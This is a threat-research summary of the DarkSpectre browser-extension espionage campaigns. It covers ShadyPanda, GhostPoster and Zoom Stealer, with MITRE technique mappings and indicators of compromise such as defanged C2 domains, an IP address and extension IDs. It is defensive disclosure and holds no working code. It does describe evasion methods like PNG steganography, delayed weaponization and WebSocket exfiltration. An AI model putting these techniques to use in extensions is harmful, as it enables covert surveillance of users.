Threat Research

DarkSpectre Large Scale Browser Extension Espionage

Securonix
DarkSpectre Large Scale Browser Extension Espionage

A single, well-resourced Chinese threat actor called DarkSpectre operated at least three large extension-based campaigns—ShadyPanda, GhostPoster, and the newly disclosed Zoom Stealer—infecting over 8.8 million users across Chrome, Edge, Firefox, and Opera using varied techniques including steganography, remote code injection, and real-time WebSocket exfiltration. The Zoom Stealer campaign alone harvested corporate meeting intelligence from 2.2M users by scraping 28+ conferencing platforms and streaming data to attacker-controlled Firebase and cloud function infrastructure. #DarkSpectre #ZoomStealer

Keypoints

  • Researchers linked over 100 browser extensions and shared infrastructure to a single actor named DarkSpectre responsible for three major campaigns (ShadyPanda, GhostPoster, Zoom Stealer) spanning 7+ years and 8.8M+ victims.
  • ShadyPanda (5.6M users) uses long-lived legitimate extensions as sleepers, remote JSON configuration C2, and time-delayed weaponization to perform mass surveillance and affiliate fraud across Chrome, Edge, and Firefox.
  • GhostPoster (1.05M users) delivers stealthy payloads by hiding JavaScript inside PNG icons (steganography), multistage loading, and low-probability activation to evade detection, targeting Firefox and Opera users.
  • The newly disclosed Zoom Stealer (2.2M users) harvests meeting links, passwords, participant lists, and speaker dossiers from 28+ conferencing platforms and streams data in real time via WebSockets to Firebase/cloud functions.
  • Investigators tied clusters via “clean” shared domains (e.g., infinitynewtab.com) used for legitimate extension features, which revealed hardcoded C2 domains and redirect chains linking all campaigns.
  • Attribution points to a China-based, well-funded operation: Alibaba Cloud hosting, ICP registrations in Chinese provinces, Chinese language artifacts in code, and targeting tuned to Chinese e-commerce affiliate schemes.

MITRE Techniques

  • [T1071.001 ] Application Layer Protocol – Real-time WebSocket connections were used to stream meeting activity directly to attacker servers (‘…persistent WebSocket connection that streams your meeting activity in real-time…’)
  • [T1041 ] Exfiltration Over C2 Channel – Collected meeting and surveillance data was sent to attacker-controlled infrastructure such as Firebase and cloud functions for storage and processing (‘…collected data in a Firebase Realtime Database (zoocorder.firebaseio.com) and tracked every page visit through a Google Cloud Function.’)
  • [T1059.007 ] JavaScript – Malicious JavaScript was executed in-browser via decoded payloads and dynamic eval() calls to perform remote code injection and runtime behavior changes (‘extracts hidden JavaScript, executes it.’ / ‘Downloads and executes JavaScript from bcaicai.com on every website visited.’)
  • [T1027.005 ] Steganography (sub-technique of Obfuscated Files/Information) – Payloads were concealed inside PNG icon files and later decoded to execute hidden JavaScript (‘Malicious code hidden inside PNG icon files using steganography. The extension loads its own logo, extracts hidden JavaScript, executes it.’)
  • [T1036.005 ] Masquerading – Extensions presented as legitimate productivity or utility tools (new tabs, translators, video downloaders) to gain trust and marketplace approvals before weaponizing (‘extensions disguised as meeting productivity tools’ / ‘presented themselves as productivity tools – new tab pages, translators, tab managers’)
  • [T1123 ] Audio Capture – Extensions included capabilities to capture audio (e.g., Chrome Audio Capture) and other meeting content as part of the data collection engine (‘One extension stands out: Chrome Audio Capture with 800,000+ installations alone.’)

Indicators of Compromise

  • [Domains ] C2, exfiltration, and infrastructure – webinarstvus[.]cloudfunctions[.]net, zoocorder.firebaseio[.]com, meetingtv[.]us, infinitynewtab[.]com, infinitytab[.]com, and other domains (e.g., jt2x[.]com, gmzdaily[.]com, liveupdt[.]com) and many more.
  • [IP Address ] Hosting – 58.144.143.27 (listed as associated hosting infrastructure).
  • [Extension names ] Malicious or abused marketplace items – Chrome Audio Capture, Twitter X Video Downloader, Google™ Translate (Opera addon by charliesmithbons).
  • [Extension IDs / UUIDs ] Marketplace identifiers tied to campaigns – example Firefox UUIDs {7536027f-96fb-4762-9e02-fdfaedd3bfb5}, {34b0d04c-29cf-473c-bb6c-c2fe94377b99} and numerous Chrome/Edge IDs listed in the report.
  • [Email addresses / publisher contacts ] Publisher or contact artifacts – nickyfeng2@edgetranslate[.]com, 1305302314@qq[.]com.

Read more: https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers